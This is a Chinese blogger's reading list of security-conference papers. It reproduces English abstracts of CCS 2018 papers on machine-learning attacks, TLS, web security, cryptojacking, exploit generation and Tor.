2018年来系统安全四大顶会“泛”Web方向论文整理(更新至20年10月)

目前,CCS的20年还没开,等开了再更新。由于篇幅太长,本文暂时只收录到20年,20年后另开更新。

CCS S&P USENIX Security NDSS
2018 Proceedings dblp program dblp Technical Sessions dblp Programme dblp
2019 Proceedings dblp program dblp Technical Sessions dblp Programme dblp
2020 Nov. 9-13, 2020, Orlando, USA program dblp Technical Sessions dblp Programme dblp

也不完全是Web方向,除了Web以外也有一些比如ML等我比较感兴趣的方向的论文。

一些论文上可能会加些标记:看过的论文:✔,我觉得还行:👍,我觉得不行:👎,如果看过没有评价的话,那可能是我要么看不懂,要么感觉一般般。(当然很多时候会比较懒,看完了也不标记)

【⚠本文很长⚠】现在统计是120097词。建议结合目录,合理使用CTRL+F搜索。

CCS

吐槽一下,CCS太大了,议题一年比一年多。

2018 Proceedings dblp

Session 2D: ML 1

Yet Another Text Captcha Solver: A Generative Adversarial Network Based Approach

Despite several attacks have been proposed, text-based CAPTCHAs are still being widely used as a security mechanism. One of the reasons for the pervasive use of text captchas is that many of the prior attacks are scheme-specific and require a labor-intensive and time-consuming process to construct. This means that a change in the captcha security features like a noisier background can simply invalid an earlier attack. This paper presents a generic, yet effective text captcha solver based on the generative adversarial network. Unlike prior machine-learning-based approaches that need a large volume of manually-labeled real captchas to learn an effective solver, our approach requires significantly fewer real captchas but yields much better performance. This is achieved by first learning a captcha synthesizer to automatically generate synthetic captchas to learn a base solver, and then fine-tuning the base solver on a small set of real captchas using transfer learning. We evaluate our approach by applying it to 33 captcha schemes, including 11 schemes that are currently being used by 32 of the top-50 popular websites including Microsoft, Wikipedia, eBay and Google. Our approach is the most capable attack on text captchas seen to date. It outperforms four state-of-the-art text-captcha solvers by not only delivering a significant higher accuracy on all testing schemes, but also successfully attacking schemes where others have zero chance. We show that our approach is highly efficient as it can solve a captcha within 0.05 second using a desktop GPU. We demonstrate that our attack is generally applicable because it can bypass the advanced security features employed by most modern text captcha schemes. We hope the results of our work can encourage the community to revisit the design and practical use of text captchas.

Model-Reuse Attacks on Deep Learning Systems

Many of today’s machine learning (ML) systems are built by reusing an array of, often pre-trained, primitive models, each fulfilling distinct functionality (e.g., feature extraction). The increasing use of primitive models significantly simplifies and expedites the development cycles of ML systems. Yet, because most of such models are contributed and maintained by untrusted sources, their lack of standardization or regulation entails profound security implications, about which little is known thus far. In this paper, we demonstrate that malicious primitive models pose immense threats to the security of ML systems. We present a broad class of model-reuse attacks wherein maliciously crafted models trigger host ML systems to misbehave on targeted inputs in a highly predictable manner. By empirically studying four deep learning systems (including both individual and ensemble systems) used in skin cancer screening, speech recognition, face verification, and autonomous steering, we show that such attacks are (i) effective - the host systems misbehave on the targeted inputs as desired by the adversary with high probability, (ii) evasive - the malicious models function indistinguishably from their benign counterparts on non-targeted inputs, (iii) elastic - the malicious models remain effective regardless of various system design choices and tuning strategies, and (iv) easy - the adversary needs little prior knowledge about the data used for system tuning or inference. We provide analytical justification for the effectiveness of model-reuse attacks, which points to the unprecedented complexity of today’s primitive models. This issue thus seems fundamental to many ML systems. We further discuss potential countermeasures and their challenges, which lead to several promising research directions.

LEMNA: Explaining Deep Learning based Security Applications

While deep learning has shown a great potential in various domains, the lack of transparency has limited its application in security or safety-critical areas. Existing research has attempted to develop explanation techniques to provide interpretable explanations for each classification decision. Unfortunately, current methods are optimized for non-security tasks ( e.g., image analysis). Their key assumptions are often violated in security applications, leading to a poor explanation fidelity. In this paper, we propose LEMNA, a high-fidelity explanation method dedicated for security applications. Given an input data sample, LEMNA generates a small set of interpretable features to explain how the input sample is classified. The core idea is to approximate a local area of the complex deep learning decision boundary using a simple interpretable model. The local interpretable model is specially designed to (1) handle feature dependency to better work with security applications ( e.g., binary code analysis); and (2) handle nonlinear local boundaries to boost explanation fidelity. We evaluate our system using two popular deep learning applications in security (a malware classifier, and a function start detector for binary reverse-engineering). Extensive evaluations show that LEMNA’s explanation has a much higher fidelity level compared to existing methods. In addition, we demonstrate practical use cases of LEMNA to help machine learning developers to validate model behavior, troubleshoot classification errors, and automatically patch the errors of the target models.

Effective Program Debloating via Reinforcement Learning

Prevalent software engineering practices such as code reuse and the “one-size-fits-all” methodology have contributed to significant and widespread increases in the size and complexity of software. The resulting software bloat has led to decreased performance and increased security vulnerabilities. We propose a system called Chisel to enable programmers to effectively customize and debloat programs. Chisel takes as input a program to be debloated and a high-level specification of its desired functionality. The output is a reduced version of the program that is correct with respect to the specification. Chisel significantly improves upon existing program reduction systems by using a novel reinforcement learning-based approach to accelerate the search for the reduced program and scale to large programs. Our evaluation on a suite of 10 widely used UNIX utility programs each comprising 13-90 KLOC of C source code demonstrates that Chisel is able to successfully remove all unwanted functionalities and reduce attack surfaces. Compared to two state-of-the-art program reducers C-Reduce and Perses, which time out on 6 programs and 2 programs espectively in 12 hours, Chisel runs up to 7.1x and 3.7x faster and finishes on all programs.

Session 3D: ML 2

Tiresias: Predicting Security Events Through Deep Learning

With the increased complexity of modern computer attacks, there is a need for defenders not only to detect malicious activity as it happens, but also to predict the specific steps that will be taken by an adversary when performing an attack. However this is still an open research problem, and previous research in predicting malicious events only looked at binary outcomes (eg. whether an attack would happen or not), but not at the specific steps that an attacker would undertake. To fill this gap we present Tiresias xspace, a system that leverages Recurrent Neural Networks (RNNs) to predict future events on a machine, based on previous observations. We test Tiresias xspace on a dataset of 3.4 billion security events collected from a commercial intrusion prevention system, and show that our approach is effective in predicting the next event that will occur on a machine with a precision of up to 0.93. We also show that the models learned by Tiresias xspace are reasonably stable over time, and provide a mechanism that can identify sudden drops in precision and trigger a retraining of the system. Finally, we show that the long-term memory typical of RNNs is key in performing event prediction, rendering simpler methods not up to the task.

DeepMem: Learning Graph Neural Network Models for Fast and Robust Memory Forensic Analysis

Kernel data structure detection is an important task in memory forensics that aims at identifying semantically important kernel data structures from raw memory dumps. It is primarily used to collect evidence of malicious or criminal behaviors. Existing approaches have several limitations: 1) list-traversal approaches are vulnerable to DKOM attacks, 2) robust signature-based approaches are not scalable or efficient, because it needs to search the entire memory snapshot for one kind of objects using one signature, and 3) both list-traversal and signature-based approaches all heavily rely on domain knowledge of operating system. Based on the limitations, we propose DeepMem, a graph-based deep learning approach to automatically generate abstract representations for kernel objects, with which we could recognize the objects from raw memory dumps in a fast and robust way. Specifically, we implement 1) a novel memory graph model that reconstructs the content and topology information of memory dumps, 2) a graph neural network architecture to embed the nodes in the memory graph, and 3) an object detection method that cross-validates the evidence collected from different parts of objects. Experiments show that DeepMem achieves high precision and recall rate in identify kernel objects from raw memory dumps. Also, the detection strategy is fast and scalable by using the intermediate memory graph representation. Moreover, DeepMem is robust against attack scenarios, like pool tag manipulation and DKOM process hiding.

Property Inference Attacks on Fully Connected Neural Networks using Permutation Invariant Representations

With the growing adoption of machine learning, sharing of learned models is becoming popular. However, in addition to the prediction properties the model producer aims to share, there is also a risk that the model consumer can infer other properties of the training data the model producer did not intend to share. In this paper, we focus on the inference of global properties of the training data, such as the environment in which the data was produced, or the fraction of the data that comes from a certain class, as applied to white-box Fully Connected Neural Networks (FCNNs). Because of their complexity and inscrutability, FCNNs have a particularly high risk of leaking unexpected information about their training sets; at the same time, this complexity makes extracting this information challenging. We develop techniques that reduce this complexity by noting that FCNNs are invariant under permutation of nodes in each layer. We develop our techniques using representations that capture this invariance and simplify the information extraction task. We evaluate our techniques on several synthetic and standard benchmark datasets and show that they are very effective at inferring various data properties. We also perform two case studies to demonstrate the impact of our attack. In the first case study we show that a classifier that recognizes smiling faces also leaks information about the relative attractiveness of the individuals in its training set. In the second case study we show that a classifier that recognizes Bitcoin mining from performance counters also leaks information about whether the classifier was trained on logs from machines that were patched for the Meltdown and Spectre attacks.

Machine Learning with Membership Privacy using Adversarial Regularization

Machine learning models leak significant amount of information about their training sets, through their predictions. This is a serious privacy concern for the users of machine learning as a service. To address this concern, in this paper, we focus on mitigating the risks of black-box inference attacks against machine learning models. We introduce a mechanism to train models with membership privacy, which ensures indistinguishability between the predictions of a model on its training data and other data points (from the same distribution). This requires minimizing the accuracy of the best black-box membership inference attack against the model. We formalize this as a min-max game, and design an adversarial training algorithm that minimizes the prediction loss of the model as well as the maximum gain of the inference attacks. This strategy, which can guarantee membership privacy (as prediction indistinguishability), acts also as a strong regularizer and helps generalizing the model. We evaluate the practical feasibility of our privacy mechanism on training deep neural networks using benchmark datasets. We show that the min-max strategy can mitigate the risks of membership inference attacks (near random guess), and can achieve this with a negligible drop in the model’s prediction accuracy (less than 4%).

Session 6D: Usable Security

Asking for a Friend: Evaluating Response Biases in Security User Studies

The security field relies on user studies, often including survey questions, to query end users’ general security behavior and experiences, or hypothetical responses to new messages or tools. Self-report data has many benefits – ease of collection, control, and depth of understanding – but also many well-known biases stemming from people’s difficulty remembering prior events or predicting how they might behave, as well as their tendency to shape their answers to a perceived audience. Prior work in fields like public health has focused on measuring these biases and developing effective mitigations; however, there is limited evidence as to whether and how these biases and mitigations apply specifically in a computer-security context. In this work, we systematically compare real-world measurement data to survey results, focusing on an exemplar, well-studied security behavior: software updating. We align field measurements about specific software updates (n=517,932) with survey results in which participants respond to the update messages that were used when those versions were released (n=2,092). This allows us to examine differences in self-reported and observed update speeds, as well as examining self-reported responses to particular message features that may correlate with these results. The results indicate that for the most part, self-reported data varies consistently and systematically with measured data. However, this systematic relationship breaks down when survey respondents are required to notice and act on minor details of experimental manipulations. Our results suggest that many insights from self-report security data can, when used with care, translate to real-world environments; however, insights about specific variations in message texts or other details may be more difficult to assess with surveys.

Towards Usable Checksums: Automating the Integrity Verification of Web Downloads for the Masses

Internet users can download software for their computers from app stores (e.g., Mac App Store and Windows Store) or from other sources, such as the developers’ websites. Most Internet users in the US rely on the latter, according to our representative study, which makes them directly responsible for the content they download. To enable users to detect if the downloaded files have been corrupted, developers can publish a checksum together with the link to the program file; users can then manually verify that the checksum matches the one they obtain from the downloaded file. In this paper, we assess the prevalence of such behavior among the general Internet population in the US (N=2,000), and we develop easy-to-use tools for users and developers to automate both the process of checksum verification and generation. Specifically, we propose an extension to the recent W3C specification for sub-resource integrity in order to provide integrity protection for download links. Also, we develop an extension for the popular Chrome browser that computes and verifies checksums of downloaded files automatically, and an extension for the WordPress CMS that developers can use to easily attach checksums to their remote content. Our in situ experiments with 40participants demonstrate the usability and effectiveness issues of checksums verification, and shows user desirability for our extension.

Investigating System Operators’ Perspective on Security Misconfigurations

Nowadays, security incidents have become a familiar “nuisance,” and they regularly lead to the exposure of private and sensitive data. The root causes for such incidents are rarely complex attacks. Instead, they are enabled by simple misconfigurations, such as authentication not being required, or security updates not being installed. For example, the leak of over 140 million Americans’ private data from Equifax’s systems is among most severe misconfigurations in recent history: The underlying vulnerability was long known, and a security patch had been available for months, but was never applied. Ultimately, Equifax blamed an employee for forgetting to update the affected system, highlighting his personal responsibility. In this paper, we investigate the operators’ perspective on security misconfigurations to approach the human component of this class of security issues. We focus our analysis on system operators, who have not received significant attention by prior research. Hence, we investigate their perspective with an inductive approach and apply a multi-step empirical methodology: (i), a qualitative study to understand how to approach the target group and measure the misconfiguration phenomenon (ii) a quantitative survey rooted in the qualitative data. We then provide the first analysis of system operators’ perspective on security misconfigurations, and we determine the factors that operators perceive as the root causes. Based on our findings, we provide practical recommendations on how to reduce security misconfigurations’ frequency and impact.

Peeling the Onion’s User Experience Layer: Examining Naturalistic Use of the Tor Browser

The strength of an anonymity system depends on the number of users. Therefore, User eXperience (UX) and usability of these systems is of critical importance for boosting adoption and use. To this end, we carried out a study with 19 non-expert participants to investigate how users experience routine Web browsing via the Tor Browser, focusing particularly on encountered problems and frustrations. Using a mixed-methods quantitative and qualitative approach to study one week of naturalistic use of the Tor Browser, we uncovered a variety of UX issues, such as broken Web sites, latency, lack of common browsing conveniences, differential treatment of Tor traffic, incorrect geolocation, operational opacity, etc. We applied this insight to suggest a number of UX improvements that could mitigate the issues and reduce user frustration when using the Tor Browser.

Session 7C: TLS

Pseudo Constant Time Implementations of TLS Are Only Pseudo Secure

Today, about 10% of TLS connections are still using CBC-mode cipher suites, despite a long history of attacks and the availability of better options (e.g. AES-GCM). In this work, we present three new types of attack against four popular fully patched implementations of TLS (Amazon’s s2n, GnuTLS, mbed TLS and wolfSSL) which elected to use “pseudo constant time” countermeasures against the Lucky 13 attack on CBC-mode. Our attacks combine several variants of the PRIME+PROBE cache timing technique with a new extension of the original Lucky 13 attack. They apply in a cross-VM attack setting and are capable of recovering most of the plaintext whilst requiring only a moderate number of TLS connections. Along the way, we uncovered additional serious (but easy to patch) bugs in all four of the TLS implementations that we studied; in three cases, these bugs lead to Lucky 13 style attacks that can be mounted remotely with no access to a shared cache. Our work shows that adopting pseudo constant time countermeasures is not sufficient to attain real security in TLS implementations in CBC mode.

Partially Specified Channels: The TLS 1.3 Record Layer without Elision

We advance the study of secure stream-based channels (Fischlin et al., CRYPTO ‘15) by considering the multiplexing of many data streams over a single channel, an essential feature of real world protocols such as TLS. Our treatment adopts the definitional perspective of Rogaway and Stegers (CSF ‘09), which offers an elegant way to reason about what standardizing documents actually provide: a partial specification of a protocol that admits a collection of compliant, fully realized implementations. We formalize partially specified channels as the component algorithms of two parties communicating over a channel. Each algorithm has an oracle that provides specification details ; the algorithms abstract the things that must be explicitly specified, while the oracle abstracts the things that need not be. Our security notions, which capture a variety of privacy and integrity goals, allow the adversary to respond to these oracle queries; security relative to these notions implies that the channel withstands attacks in the presence of worst-case (i.e., adversarial) realizations of the specification details. We apply this framework to a formal treatment of the TLS 13 record and, in doing so, show that its security hinges crucially upon details left unspecified by the standard.

The Multi-user Security of GCM, Revisited: Tight Bounds for Nonce Randomization

Multi-user (mu) security considers large-scale attackers (e.g., state actors) that given access to a number of sessions, attempt to compromise at least one of them. Mu security of authenticated encryption (AE) was explicitly considered in the development of TLS 1.3. This paper revisits the mu security of GCM, which remains to date the most widely used dedicated AE mode. We provide new concrete security bounds which improve upon previous work by adopting a refined parameterization of adversarial resources that highlights the impact on security of (1) nonce re-use across users and of (2) re-keying. As one of the main applications, we give tight security bounds for the nonce-randomization mechanism adopted in the record protocol of TLS 1.3 as a mitigation of large-scale multi-user attacks. We provide tight security bounds that yield the first validation of this method. In particular, we solve the main open question of Bellare and Tackmann (CRYPTO ‘16), who only considered restricted attackers which do not attempt to violate integrity, and only gave non-tight bounds.

Session 8A: Web Security 1

Predicting Impending Exposure to Malicious Content from User Behavior

Many computer-security defenses are reactive—they operate only when security incidents take place, or immediately thereafter. Recent efforts have attempted to predict security incidents before they occur, to enable defenders to proactively protect their devices and networks. These efforts have primarily focused on long-term predictions. We propose a system that enables proactive defenses at the level of a single browsing session. By observing user behavior, it can predict whether they will be exposed to malicious content on the web seconds before the moment of exposure, thus opening a window of opportunity for proactive defenses. We evaluate our system using three months’ worth of HTTP traffic generated by 20,645 users of a large cellular provider in 2017 and show that it can be helpful, even when only very low false positive rates are acceptable, and despite the difficulty of making “on-the-fly’’ predictions. We also engage directly with the users through surveys asking them demographic and security-related questions, to evaluate the utility of self-reported data for predicting exposure to malicious content. We find that self-reported data can help forecast exposure risk over long periods of time. However, even on the long-term, self-reported data is not as crucial as behavioral measurements to accurately predict exposure.

Clock Around the Clock: Time-Based Device Fingerprinting

Physical device fingerprinting exploits hardware features to uniquely identify a machine. This technique has been used for authentication, license binding, or attackers identification, among other tasks. More recently, hardware features have also been introduced to identify web users and perform web tracking. A particular type of hardware fingerprint exploits differences in the computer internal clock signals. However, previous methods to test for these differences relied on complex experiments performed by running native code in the target machine. In this paper, we show a new way to compute a hardware finger- printing, based on timing the execution of sequences of instructions readily available in API functions. Due to its simplicity, this method can also be performed remotely by simply timing few seemingly innocuous lines of JavaScript code. We tested our approach with different functions, such as common string manipulation or widespread cryptographic routines, and found that several of them can be used as basic blocks for fingerprinting. Using this technique, we implemented a tool called CryptoFP. We tested its native implementation in a homogeneous scenario, to distinguish among a perfectly identical (both in software and hardware) set of computers. CryptoFP was able to correctly discriminate all the identical computers in this scenario and recognize the same computer also under different CPU load configurations, outperforming every other hardware fingerprinting method. We then show how CryptoFP can be implemented using a combination of the HTML5 Cryptography API and standard timing API for web device fingerprinting. In this case, we compared our method, both in the same homogeneous scenario and by performing an experiment with real-world users running heterogeneous devices, against other state-of-the-art web device fingerprinting solutions. In both cases, our approach clearly outperforms all existing methods.

The Web’s Sixth Sense: A Study of Scripts Accessing Smartphone Sensors

We present the first large-scale measurement of smartphone sensor API usage and stateless tracking on the mobile web. We extend the OpenWPM web privacy measurement tool to develop OpenWPM-Mobile, adding the ability to emulate plausible sensor values for different smartphone sensors such as motion, orientation, proximity and light. Using OpenWPM-Mobile we find that one or more sensor APIs are accessed on 3695 of the top 100K websites by scripts originating from 603 distinct domains. We also detect fingerprinting attempts on mobile platforms, using techniques previously applied in the desktop setting. We find significant overlap between fingerprinting scripts and scripts accessing sensor data. For example, 63% of the scripts that access motion sensors also engage in browser fingerprinting. To better understand the real-world uses of sensor APIs, we cluster JavaScript programs that access device sensors and then perform automated code comparison and manual analysis. We find a significant disparity between the actual and intended use cases of device sensor as drafted by W3C. While some scripts access sensor data to enhance user experience, such as orientation detection and gesture recognition, tracking and analytics are the most common use cases among the scripts we analyzed. We automated the detection of sensor data exfiltration and observed that the raw readings are frequently sent to remote servers for further analysis. Finally, we evaluate available countermeasures against the misuse of sensor APIs. We find that popular tracking protection lists such as EasyList and Disconnect commonly fail to block most tracking scripts that misuse sensors. Studying nine popular mobile browsers we find that even privacy-focused browsers, such as Brave and Firefox Focus, fail to implement mitigations suggested by W3C, which includes limiting sensor access from insecure contexts and cross-origin iframes. We have reported these issues to the browser vendors.

Session 8B: Usable Passwords

Reinforcing System-Assigned Passphrases Through Implicit Learning

People tend to choose short and predictable passwords that are vulnerable to guessing attacks. Passphrases are passwords consisting of multiple words, initially introduced as more secure authentication keys that people could recall. Unfortunately, people tend to choose predictable natural language patterns in passphrases, again resulting in vulnerability to guessing attacks. One solution could be system-assigned passphrases, but people have difficulty recalling them. With the goal of improving the usability of system-assigned passphrases, we propose a new approach of reinforcing system-assigned passphrases using implicit learning techniques. We design and test a system that implements this approach using two implicit learning techniques: contextual cueing and semantic priming. In a 780-participant online study, we explored the usability of 4-word system-assigned passphrases using our system compared to a set of control conditions. Our study showed that our system significantly improves usability of system-assigned passphrases, both in terms of recall rates and login time.

“What was that site doing with my Facebook password?”: Designing Password-Reuse Notifications

Password reuse is widespread, so a breach of one provider’s password database threatens accounts on other providers. When companies find stolen credentials on the black market and notice potential password reuse, they may require a password reset and send affected users a notification. Through two user studies, we provide insight into such notifications. In Study 1, 180 respondents saw one of six representative notifications used by companies in situations potentially involving password reuse. Respondents answered questions about their reactions and understanding of the situation. Notifications differed in the concern they elicited and intended actions they inspired. Concerningly, less than a third of respondents reported intentions to change any passwords. In Study 2, 588 respondents saw one of 15 variations on a model notification synthesizing results from Study 1. While the variations’ impact differed in small ways, respondents’ intended actions across all notifications would leave them vulnerable to future password-reuse attacks. We discuss best practices for password-reuse notifications and how notifications alone appear insufficient in solving password reuse.

On the Accuracy of Password Strength Meters

Password strength meters are an important tool to help users choose secure passwords. Strength meters can only then provide reasonable guidance when they are accurate, i.e., their score correctly reflect password strength. A strength meter with low accuracy may do more harm than good and guide the user to choose passwords with a high score but low actual security. While a substantial number of different strength meters is proposed in the literature and deployed in practice, we are lacking a clear picture of which strength meters provide high accuracy, and thus are most helpful for guiding users. Furthermore, we lack a clear understanding of how to compare accuracies of strength meters. In this work, (i) we propose a set of properties that a strength meter needs to fulfill to be considered to have high accuracy, (ii) we use these properties to select a suitable measure that can determine the accuracy of strength meters, and (iii) we use the selected measure to compare a wide range of strength meters proposed in the academic literature, provided by password managers, operating systems, and those used on websites. We expect our work to be helpful in the selection of good password strength meters by service operators, and to aid the further development of improved strength meters.

Session 9A: Web Security 2

Mystique: Uncovering Information Leakage from Browser Extensions

Browser extensions are small JavaScript, CSS and HTML programs that run inside the browser with special privileges. These programs, often written by third parties, operate on the pages that the browser is visiting, giving the user a programmatic way to configure the browser. The privacy implications that arise by allowing privileged third-party code to execute inside the users’ browser are not well understood. In this paper, we develop a taint analysis framework for browser extensions and use it to perform a large scale study of extensions in regard to their privacy practices. We first present a hybrid approach to traditional taint analysis: by leveraging the fact that extension source code is available to the runtime JavaScript engine, we implement as well as enhance traditional taint analysis using information gathered from static data flow and control-flow analysis of the JavaScript source code. Based on this, we further modify the Chromium browser to support taint tracking for extensions. We analyzed 178,893 extensions crawled from the Chrome Web Store between September 2016 and March 2018, as well as a separate set of all available extensions (2,790 in total) for the Opera browser at the time of analysis. From these, our analysis flagged 3,868 (2.13%) extensions as potentially leaking privacy-sensitive information. The top 10 most popular Chrome extensions that we confirmed to be leaking privacy-sensitive information have more than 60 million users combined. We ran the analysis on a local Kubernetes cluster and were able to finish within a month, demonstrating the feasibility of our approach for large-scale analysis of browser extensions. At the same time, our results emphasize the threat browser extensions pose to user privacy, and the need for countermeasures to safeguard against misbehaving extensions that abuse their privileges.

How You Get Shot in the Back: A Systematical Study about Cryptojacking in the Real World

As a new mechanism to monetize web content, cryptocurrency mining is becoming increasingly popular. The idea is simple: a webpage delivers extra workload (JavaScript) that consumes computational resources on the client machine to solve cryptographic puzzles, typically without notifying users or having explicit user consent. This new mechanism, often heavily abused and thus considered a threat termed “cryptojacking”, is estimated to affect over 10 million web users every month; however, only a few anecdotal reports exist so far and little is known about its severeness, infrastructure, and technical characteristics behind the scene. This is likely due to the lack of effective approaches to detect cryptojacking at a large-scale (e.g., VirusTotal). In this paper, we take a first step towards an in-depth study over cryptojacking. By leveraging a set of inherent characteristics of cryptojacking scripts, we build CMTracker, a behavior-based detector with two runtime profilers for automatically tracking Cryptocurrency Mining scripts and their related domains. Surprisingly, our approach successfully discovered 2,770 unique cryptojacking samples from 853,936 popular web pages, including 868 among top 100K in Alexa list. Leveraging these samples, we gain a more comprehensive picture of the cryptojacking attacks, including their impact, distribution mechanisms, obfuscation, and attempts to evade detection. For instance, a diverse set of organizations benefit from cryptojacking based on the unique wallet ids. In addition, to stay under the radar, they frequently update their attack domains (fastflux) on the order of days. Many attackers also apply evasion techniques, including limiting the CPU usage, obfuscating the code, etc.

MineSweeper: An In-depth Look into Drive-by Cryptocurrency Mining and Its Defense

A wave of alternative coins that can be effectively mined without specialized hardware, and a surge in cryptocurrencies’ market value has led to the development of cryptocurrency mining ( cryptomining ) services, such as Coinhive, which can be easily integrated into websites to monetize the computational power of their visitors. While legitimate website operators are exploring these services as an alternative to advertisements, they have also drawn the attention of cybercriminals: drive-by mining (also known as cryptojacking ) is a new web-based attack, in which an infected website secretly executes JavaScript code and/or a WebAssembly module in the user’s browser to mine cryptocurrencies without her consent. In this paper, we perform a comprehensive analysis on Alexa’s Top 1 Million websites to shed light on the prevalence and profitability of this attack. We study the websites affected by drive-by mining to understand the techniques being used to evade detection, and the latest web technologies being exploited to efficiently mine cryptocurrency. As a result of our study, which covers 28 Coinhive-like services that are widely being used by drive-by mining websites, we identified 20 active cryptomining campaigns. Motivated by our findings, we investigate possible countermeasures against this type of attack. We discuss how current blacklisting approaches and heuristics based on CPU usage are insufficient, and present MineSweeper, a novel detection technique that is based on the intrinsic characteristics of cryptomining code, and, thus, is resilient to obfuscation. Our approach could be integrated into browsers to warn users about silent cryptomining when visiting websites that do not ask for their consent.

Pride and Prejudice in Progressive Web Apps: Abusing Native App-like Features in Web Applications

Progressive Web App (PWA) is a new generation of Web application designed to provide native app-like browsing experiences even when a browser is offline. PWAs make full use of new HTML5 features which include push notification, cache, and service worker to provide short-latency and rich Web browsing experiences. We conduct the first systematic study of the security and privacy aspects unique to PWAs. We identify security flaws in main browsers as well as design flaws in popular third-party push services, that exacerbate the phishing risk. We introduce a new side-channel attack that infers the victim’s history of visited PWAs. The proposed attack exploits the offline browsing feature of PWAs using a cache. We demonstrate a cryptocurrency mining attack which abuses service workers. Defenses and recommendations to mitigate the identified security and privacy risks are suggested with in-depth understanding.

Session 9D: Vulnerability Detection

Block Oriented Programming: Automating Data-Only Attacks

With the widespread deployment of Control-Flow Integrity (CFI), control-flow hijacking attacks, and consequently code reuse attacks, are significantly more difficult. CFI limits control flow to well-known locations, severely restricting arbitrary code execution. Assessing the remaining attack surface of an application under advanced control-flow hijack defenses such as CFI and shadow stacks remains an open problem. We introduce BOPC, a mechanism to automatically assess whether an attacker can execute arbitrary code on a binary hardened with CFI/shadow stack defenses. BOPC computes exploits for a target program from payload specifications written in a Turing-complete, high-level language called SPL that abstracts away architecture and program-specific details. SPL payloads are compiled into a program trace that executes the desired behavior on top of the target binary. The input for BOPC is an SPL payload, a starting point (e.g., from a fuzzer crash) and an arbitrary memory write primitive that allows application state corruption. To map SPL payloads to a program trace, BOPC introduces Block Oriented Programming (BOP), a new code reuse technique that utilizes entire basic blocks as gadgets along valid execution paths in the program, i.e., without violating CFI or shadow stack policies. We find that the problem of mapping payloads to program traces is NP-hard, so BOPC first reduces the search space by pruning infeasible paths and then uses heuristics to guide the search to probable paths. BOPC encodes the BOP payload as a set of memory writes. We execute 13 SPL payloads applied to 10 popular applications. BOPC successfully finds payloads and complex execution traces – which would likely not have been found through manual analysis – while following the target’s Control-Flow Graph under an ideal CFI policy in 81% of the cases.

Threat Intelligence Computing

Cyber threat hunting is the process of proactively and iteratively formulating and validating threat hypotheses based on security-relevant observations and domain knowledge. To facilitate threat hunting tasks, this paper introduces threat intelligence computing as a new methodology that models threat discovery as a graph computation problem. It enables efficient programming for solving threat discovery problems, equipping threat hunters with a suite of potent new tools for agile codifications of threat hypotheses, automated evidence mining, and interactive data inspection capabilities. A concrete realization of a threat intelligence computing platform is presented through the design and implementation of a domain-specific graph language with interactive visualization support and a distributed graph database. The platform was evaluated in a two-week DARPA competition for threat detection on a test bed comprising a wide variety of systems monitored in real time. During this period, sub-billion records were produced, streamed, and analyzed, dozens of threat hunting tasks were dynamically planned and programmed, and attack campaigns with diverse malicious intent were discovered. The platform exhibited strong detection and analytics capabilities coupled with high efficiency, resulting in a leadership position in the competition. Additional evaluations on comprehensive policy reasoning are outlined to demonstrate the versatility of the platform and the expressiveness of the language.

Check It Again: Detecting Lacking-Recheck Bugs in OS Kernels

Operating system kernels carry a large number of security checks to validate security-sensitive variables and operations. For example, a security check should be embedded in a code to ensure that a user-supplied pointer does not point to the kernel space. Using security-checked variables is typically safe. However, in reality, security-checked variables are often subject to modification after the check. If a recheck is lacking after a modification, security issues may arise, e.g., adversaries can control the checked variable to launch critical attacks such as out-of-bound memory access or privilege escalation. We call such cases lacking-recheck (LRC) bugs, a subclass of TOCTTOU bugs, which have not been explored yet. In this paper, we present the first in-depth study of LRC bugs and develop LRSan, a static analysis system that systematically detects LRC bugs in OS kernels. Using an inter-procedural analysis and multiple new techniques, LRSan first automatically identifies security checks, critical variables, and uses of the checked variables, and then reasons about whether a modification is present after a security check. A case in which a modification is present but a recheck is lacking is an LRC bug. We apply LRSan to the latest Linux kernel and evaluate the effectiveness of LRSan. LRSan reports thousands of potential LRC cases, and we have confirmed 19 new LRC bugs. We also discuss patching strategies of LRC bugs based on our study and bug-fixing experience.

Revery: From Proof-of-Concept to Exploitable

Automatic exploit generation is an open challenge. Existing solutions usually explore in depth the crashing paths, i.e., paths taken by proof-of-concept (POC) inputs triggering vulnerabilities, and generate exploits when exploitable states are found along the paths. However, exploitable states do not always exist in crashing paths. Moreover, existing solutions heavily rely on symbolic execution and are not scalable in path exploration and exploit generation. In addition, few solutions could exploit heap-based vulnerabilities. In this paper, we propose a new solution revery to search for exploitable states in paths diverging from crashing paths, and generate control-flow hijacking exploits for heap-based vulnerabilities. It adopts three novel techniques:(1) a digraph to characterize a vulnerability’s memory layout and its contributor instructions;(2) a fuzz solution to explore diverging paths, which have similar memory layouts as the crashing paths, in order to search more exploitable states and generate corresponding diverging inputs;(3) a stitch solution to stitch crashing paths and diverging paths together, and synthesize EXP inputs able to trigger both vulnerabilities and exploitable states. We have developed a prototype of revery based on the binary analysis engine angr, and evaluated it on a set of 19 real world CTF (capture the flag) challenges. Experiment results showed that it could generate exploits for 9 (47%) of them, and generate EXP inputs able to trigger exploitable states for another 5 (26%) of them.

Session 10A: TOR

Deep Fingerprinting: Undermining Website Fingerprinting Defenses with Deep Learning

Website fingerprinting enables a local eavesdropper to determine which websites a user is visiting over an encrypted connection. State-of-the-art website fingerprinting attacks have been shown to be effective even against Tor. Recently, lightweight website fingerprinting defenses for Tor have been proposed that substantially degrade existing attacks: WTF-PAD and Walkie-Talkie. In this work, we present Deep Fingerprinting (DF), a new website fingerprinting attack against Tor that leverages a type of deep learning called Convolutional Neural Networks (CNN) with a sophisticated architecture design, and we evaluate this attack against WTF-PAD and Walkie-Talkie. The DF attack attains over 98% accuracy on Tor traffic without defenses, better than all prior attacks, and it is also the only attack that is effective against WTF-PAD with over 90% accuracy. Walkie-Talkie remains effective, holding the attack to just 49.7% accuracy. In the more realistic open-world setting, our attack remains effective, with 0.99 precision and 0.94 recall on undefended traffic. Against traffic defended with WTF-PAD in this setting, the attack still can get 0.96 precision and 0.68 recall. These findings highlight the need for effective defenses that protect against this new attack and that could be deployed in Tor.

Privacy-Preserving Dynamic Learning of Tor Network Traffic

Experimentation tools facilitate exploration of Tor performance and security research problems and allow researchers to safely and privately conduct Tor experiments without risking harm to real Tor users. However, researchers using these tools configure them to generate network traffic based on simplifying assumptions and outdated measurements and without understanding the efficacy of their configuration choices. In this work, we design a novel technique for dynamically learning Tor network traffic models using hidden Markov modeling and privacy-preserving measurement techniques. We conduct a safe but detailed measurement study of Tor using 17 relays (~2% of Tor bandwidth) over the course of 6 months, measuring general statistics and models that can be used to generate a sequence of streams and packets. We show how our measurement results and traffic models can be used to generate traffic flows in private Tor networks and how our models are more realistic than standard and alternative network traffic generation~methods.

